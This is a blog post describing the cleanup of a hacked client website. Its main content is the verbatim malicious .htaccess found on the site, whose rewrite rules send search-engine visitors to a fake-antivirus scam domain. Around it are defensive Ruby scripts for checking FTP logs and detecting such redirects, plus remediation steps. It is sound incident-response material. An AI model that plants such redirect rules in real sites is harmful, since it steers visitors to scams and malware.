Sunday, April 11, 2010

This site may harm your computer

SkyHi @ Sunday, April 11, 2010
Today the website of one of our clients was blacklisted by Google for containing malicious software that downloads and installs without the user’s consent. Google displayed “This site may harm your computer” under the website in the results page.
Analyzing the site’s sources we found obfuscated JavaScript code inserted near the body and html tags in .html, .php and .tpl files, and a .htaccess file with the following content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://real-antispyware.info/0/go.php?sid=2 [R,L]
Hmm, visitors from search engines were redirected to real-antispyware.info. This website is a scam that shows a JavaScript animation fooling the user with a message that his computer is infected and prompts him to download and install a fake antivirus.
Analyzing the IP addresses in the FTP logs we found connections from Russia and China that altered the client’s website. Somehow they got the user’s FTP password (this can be done in many ways: weak password, traffic sniffing, virus, keylogger, trojan, …) and altered the website files.
You can use this simple Ruby script to analyze your FTP logs. By default it is configured for a Plesk server and shows the suspicious lines (change the IGNORE variables to fit your needs). You may need to install rubygems and the geoip gem.
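A small Ruby check for exactly this kind of .htaccess tampering, added here as an example and not part of the original post: it groups RewriteCond lines with their RewriteRule and flags blocks that key on a search-engine referer and redirect to a host other than our own. The sample .htaccess text and the host names in it are constructed.

```ruby
# Added example (not from the original post): flag .htaccess rewrite blocks
# that send search-engine visitors to a foreign host. Host names are made up.
require 'uri'

# referer keywords the malicious RewriteCond lines matched on
SEARCH_ENGINE_WORDS = %w{google aol msn yahoo yandex rambler ya}

# Group each run of RewriteCond lines with the RewriteRule that follows it.
# Returns [{ :conds => [{:var, :pattern, :flags}], :pattern, :target, :flags }]
def parse_rewrite_blocks(text)
  blocks, pending = [], []
  text.each_line do |raw|
    line = raw.strip                      # also drops CRLF (^M) line endings
    next if line.empty? or line[0, 1] == '#'
    directive, *args = line.split(/\s+/)
    case directive.downcase
    when 'rewritecond'
      pending << { :var => args[0], :pattern => args[1], :flags => args[2].to_s }
    when 'rewriterule'
      blocks << { :conds => pending, :pattern => args[0],
                  :target => args[1], :flags => args[2].to_s }
      pending = []
    end
  end
  blocks
end

# Suspicious: a HTTP_REFERER condition names a search engine AND the rule's
# target is an absolute URL on a host other than our own.
def suspicious_redirects(text, own_host)
  parse_rewrite_blocks(text).select do |b|
    on_search_referer = b[:conds].any? do |c|
      c[:var].to_s.include?('HTTP_REFERER') and
        SEARCH_ENGINE_WORDS.any? { |w| c[:pattern].to_s.downcase.include?(w) }
    end
    target_host = (URI.parse(b[:target].to_s).host rescue nil)
    on_search_referer and target_host and target_host != own_host
  end
end

# constructed sample: one malicious block followed by a legitimate www redirect
SAMPLE_HTACCESS = "RewriteEngine On\r\n" +
  "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\r\n" +
  "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\r\n" +
  "RewriteRule .* http://fake-av.example/go.php?sid=2 [R,L]\n" +
  "RewriteCond %{HTTP_HOST} ^www\\.example\\.com$ [NC]\n" +
  "RewriteRule ^(.*)$ http://example.com/$1 [R=301,L]\n"

puts suspicious_redirects(SAMPLE_HTACCESS, 'example.com').map { |b| "SUSPICIOUS: #{b[:target]}" }
```

Run it against each .htaccess under the document root (for example with `Dir.glob("**/.htaccess")`) after a cleanup to confirm no redirect block survived.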
#!/usr/bin/ruby

require 'rubygems'
require 'geoip'
require 'zlib'

# hide log lines from these countries (ISO 3166 two-letter codes)
# Example: RO US
IGNORE_COUNTRIES = %w{RO US}
# the free GeoIP database is not 100% accurate,
# so we may need to ignore a few IP addresses explicitly
IGNORE_IP = %w{127.0.0.1 127.0.0.2}

# Plesk keeps the FTP transfer logs here (rotated copies are gzipped)
files = Dir.glob("/usr/local/psa/var/log/xferlog*")
geoip = GeoIP.new('/var/lib/GeoIP/GeoIP.dat')

# Return the two-letter country code (field 3 of the GeoIP result), "??" if unknown
def ip2country(geoip, ip)
  geoip.country(ip)[3] || "??"
end

ip_list = []
files.each do |filename|
  puts ""
  puts "Processing #{filename} ..."

  File.open(filename) do |f|
    input = f
    input = Zlib::GzipReader.new(f) if File.extname(filename) == ".gz"

    while line = input.gets do
      # xferlog format: the 7th field (index 6) is the remote host / client IP
      ip = line.split(/\s+/)[6]
      next if ip.nil? || ip.empty?

      # report each IP address only once
      unless ip_list.include? ip
        country = ip2country(geoip, ip)
        unless IGNORE_COUNTRIES.include? country.upcase or IGNORE_IP.include? ip
          puts " [#{country} : #{ip}] => #{line}"
        end
        ip_list << ip
      end
    end
  end
end
Steps that need to be followed:
  1. Change FTP password
  2. Upload a clean copy from the backups of the website
  3. Submit the website in the Webmaster’s Tools for reconsideration
  4. Audit your company security: computers, firewalls, antiviruses, software, …
You may find Google’s diagnostic tool useful (replace example.com with your domain):
http://www.google.com/safebrowsing/diagnostic?site=http://example.com